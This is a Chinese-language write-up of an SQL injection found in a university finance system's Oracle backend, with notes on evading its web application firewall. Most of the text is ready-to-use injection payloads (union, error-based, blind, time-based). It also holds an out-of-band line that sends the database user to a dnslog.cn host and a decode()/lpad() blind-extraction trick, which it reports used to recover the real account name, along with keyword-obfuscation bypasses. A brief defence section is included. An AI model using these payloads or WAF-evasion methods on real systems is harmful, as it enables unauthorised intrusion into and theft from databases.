Oracle注入漏洞挖掘与WAF绕过技术详解<\/h1>

0x01 漏洞背景<\/h2>
本文记录了一次针对985高校财务系统的Oracle注入漏洞挖掘过程，重点介绍了如何绕过Web应用防火墙(WAF)的限制。该漏洞存在于财务系统的"支出金额范围（元）"查询功能中，通过输入特殊字符可触发Oracle数据库报错。<\/p>

0x02 漏洞发现<\/h2>

注入点识别<\/strong>：<\/p>

在"支出金额范围（元）"输入单引号('<\/code>)触发Oracle数据库报错<\/li>
报错信息显示为"单引号未正确终止"，确认存在SQL注入漏洞<\/li> <\/ul> <\/li>
环境特点<\/strong>：<\/p> 目标系统使用Oracle数据库<\/li> 部署了严格的WAF防护<\/li> 数据包被全局加密<\/li> 直接使用常见注入技术会触发IP封禁<\/li> <\/ul> <\/li> <\/ol> 0x03 Oracle注入技术精要<\/h2> 联合查询注入(Union-based)<\/h3> \/?<\/span>id=<\/span>1<\/span> order<\/span> by<\/span> 3<\/span> --+ -- 判断列数 <\/span><\/span><\/span><\/span>\/?<\/span>id=-<\/span>1<\/span> union<\/span> select<\/span> null<\/span>,null<\/span>,null<\/span> from<\/span> dual --+ -- 获取显位 <\/span><\/span><\/span><\/span>\/?<\/span>id=-<\/span>1<\/span> union<\/span> select<\/span> 1<\/span>,'2'<\/span>,'3'<\/span> from<\/span> dual --+ -- 获取显位 <\/span><\/span><\/span><\/span>\/?<\/span>id=-<\/span>1<\/span> union<\/span> select<\/span> 1<\/span>,(select<\/span> username from<\/span> all_users where<\/span> rownum=<\/span>1<\/span>),'3'<\/span> from<\/span> dual --+ -- 获取用户名(相当于MySQL的库名) <\/span><\/span><\/span><\/span>\/?<\/span>id=-<\/span>1<\/span>' union select NULL,(select table_name from user_tables where rownum=1 and owner='<\/span>XXX'),NULL from dual--+ -- 获取XXX用户下的表名 <\/span><\/span><\/span>\/?id=-1 union select 1,(select column_name from all_tab_columns where owner='<\/span>XXX' and table_name='<\/span>USER<\/span>' and rownum=1),'<\/span>3<\/span>' from dual --+ -- 获取XXX用户下USER表的字段 <\/span><\/span><\/span>\/?id=-1 union select 1,(select concat(concat(username,'<\/span>~~<\/span>'),password) from users where rownum=1),null from dual --+ -- 获取数据 <\/span><\/span><\/span><\/code><\/pre>报错注入(Error-based)<\/h3> \/?<\/span>id=-<\/span>1<\/span>' or 1=ctxsys.drithsx.sn(1,'<\/span>~<\/span>'%7c%7c(select user from dual)%7c%7c'<\/span>~<\/span>') --+ <\/span><\/span><\/span>\/?id=-1'<\/span> or<\/span> (select<\/span> upper<\/span>(XMLType(chr(60<\/span>)%<\/span>7<\/span>c<\/span>%<\/span>7<\/span>cchr(58<\/span>)%<\/span>7<\/span>c<\/span>%<\/span>7<\/span>c<\/span>(select<\/span> user<\/span> from<\/span> dual)%<\/span>7<\/span>c<\/span>%<\/span>7<\/span>cchr(62<\/span>))) from<\/span> dual) is<\/span> not<\/span> null<\/span> --+ <\/span><\/span><\/span><\/span>\/?<\/span>id=-<\/span>1<\/span>' or (select dbms_xdb_version.checkin('<\/span>~<\/span>'%7c%7c(select user from dual)%7c%7c'<\/span>~<\/span>') from dual) is not null--+ <\/span><\/span><\/span><\/code><\/pre>布尔盲注(Boolean-based)<\/h3> \/?<\/span>id=<\/span>1<\/span> and<\/span> (select<\/span> ascii(substr(user<\/span>,1<\/span>,1<\/span>))from<\/span> dual)><\/span>65<\/span> --+ <\/span><\/span><\/span><\/code><\/pre>时间盲注(Time-based)<\/h3> \/?<\/span>id=<\/span>1<\/span>' and 1=(case when (ascii(substr((select user from dual),1,1))>65) then dbms_pipe.receive_message('<\/span>RDS',5) else 0 end) --+ <\/span><\/span><\/span><\/code><\/pre>DNSLOG带外注入(OOB)<\/h3> \/?<\/span>id=<\/span>1<\/span> and<\/span> utl_http.request('http:\/\/'<\/span>%<\/span>7<\/span>c<\/span>%<\/span>7<\/span>c<\/span>(select<\/span> user<\/span> from<\/span> dual)%<\/span>7<\/span>c<\/span>%<\/span>7<\/span>c<\/span>'.xxxxxx.dnslog.cn\/oracle'<\/span>)=<\/span>1<\/span> --+ <\/span><\/span><\/span><\/code><\/pre>0x04 WAF绕过实战技巧<\/h2> 1. 绕过策略分析<\/h3> WAF检测并拦截的关键字：<\/p> select<\/code>, substr<\/code>, length<\/code>, instr<\/code>, ascii<\/code>等常见函数<\/li> 直接使用这些函数会触发IP封禁<\/li> <\/ul> <\/li> 解决方案：<\/p> 使用冷门Oracle函数替代<\/li> 利用Oracle特有的函数特性构造payload<\/li> 避免使用常见注入模式<\/li> <\/ul> <\/li> <\/ul> 2. 关键绕过技术：decode()函数盲注<\/h3> decode()函数语法<\/strong>：<\/p> decode(表达式<\/span>, value, value1, value2) <\/span><\/span><\/code><\/pre> 当"表达式"等于"value"时，输出value1<\/li> 否则输出value2<\/li> <\/ul> 利用方式<\/strong>：<\/p> 1<\/span>\/<\/span>decode(lpad(user<\/span>,1<\/span>,1<\/span>),'A'<\/span>,1<\/span>,0<\/span>) <\/span><\/span><\/code><\/pre> 当lpad(user,1,1)<\/code>等于'A'时，decode返回1，表达式变为1\/1=1<\/li> 否则返回0，表达式变为1\/0，触发Oracle除数为0错误<\/li> <\/ul> 3. lpad()函数详解<\/h3> lpad()函数语法<\/strong>：<\/p> lpad(string, padded_length, [pad_string]) <\/span><\/span><\/code><\/pre> string<\/code>: 要填充的原始字符串<\/li> padded_length<\/code>: 结果字符串的总长度<\/li> pad_string<\/code>: (可选)用于填充的字符，默认为空格<\/li> <\/ul> 示例<\/strong>：<\/p> lpad(user,1,1)<\/code> - 返回用户名的第一个字符<\/li> lpad(user,2,1)<\/code> - 返回用户名的前两个字符<\/li> lpad(user,9,6)<\/code> - 当用户名不足9位时，左侧填充'6'使其达到9位<\/li> <\/ul> 4. 实际注入过程<\/h3> 确定用户名长度<\/strong>：<\/p> 构造payload：1\/decode(lpad(user,4,1),'CWBS',1,0)<\/code>成功<\/li> 构造payload：1\/decode(lpad(user,5,1),'CWBSS',1,0)<\/code>失败<\/li> 结论：用户名长度为4位<\/li> <\/ul> <\/li> 逐字符爆破<\/strong>：<\/p> 第一位：1\/decode(lpad(user,1,1),'C',1,0)<\/code>成功<\/li> 第二位：1\/decode(lpad(user,2,1),'CW',1,0)<\/code>成功<\/li> 第三位：1\/decode(lpad(user,3,1),'CWB',1,0)<\/code>成功<\/li> 第四位：1\/decode(lpad(user,4,1),'CWBS',1,0)<\/code>成功<\/li> <\/ul> <\/li> 结果验证<\/strong>：<\/p> 成功获取Oracle数据库当前连接用户名为"CWBS"<\/li> 通过不同的回显信息(除数为0 vs 查询结果超过控制数)判断猜测是否正确<\/li> <\/ul> <\/li> <\/ol> 0x05 技术总结<\/h2> Oracle注入特点<\/strong>：<\/p> 使用dual<\/code>作为虚拟表<\/li> 需要熟悉Oracle特有的系统表和函数<\/li> 报错信息可能不如MySQL详细<\/li> <\/ul> <\/li> WAF绕过要点<\/strong>：<\/p> 避免使用常见注入函数<\/li> 利用冷门函数如decode()<\/code>和lpad()<\/code><\/li> 结合Oracle特有的错误机制(如除数为0)<\/li> 需要手动逐个字符测试，无法使用自动化工具<\/li> <\/ul> <\/li> 防御建议<\/strong>：<\/p> 使用参数化查询<\/li> 对输入进行严格过滤和类型检查<\/li> 限制数据库用户权限<\/li> WAF规则需要覆盖各种冷门函数<\/li> <\/ul> <\/li> <\/ol> 0x06 扩展学习<\/h2> 其他可能可用的Oracle函数<\/strong>：<\/p> replace()<\/code><\/li> translate()<\/code><\/li> regexp_replace()<\/code><\/li> wm_concat()<\/code><\/li> <\/ul> <\/li> Oracle系统表参考<\/strong>：<\/p> all_users<\/code> - 所有用户<\/li> user_tables<\/code> - 当前用户的表<\/li> all_tab_columns<\/code> - 所有表的列信息<\/li> session_roles<\/code> - 当前会话的角色<\/li> <\/ul> <\/li> 进阶绕过技术<\/strong>：<\/p> 使用注释分割关键字：sel\/*xxx*\/ect<\/code><\/li> 使用字符编码：CHR(115)||CHR(101)||CHR(108)||CHR(101)||CHR(99)||CHR(116)<\/code>代替"select"<\/li> 利用Oracle的XML函数进行数据外带<\/li> <\/ul> <\/li> <\/ol> 本技术文档详细记录了Oracle注入漏洞的发现过程、各种注入技术的实现方法以及针对严格WAF的绕过技巧，重点介绍了使用decode()和lpad()函数实现盲注的独特方法，为安全研究人员提供了实用的参考方案。<\/p>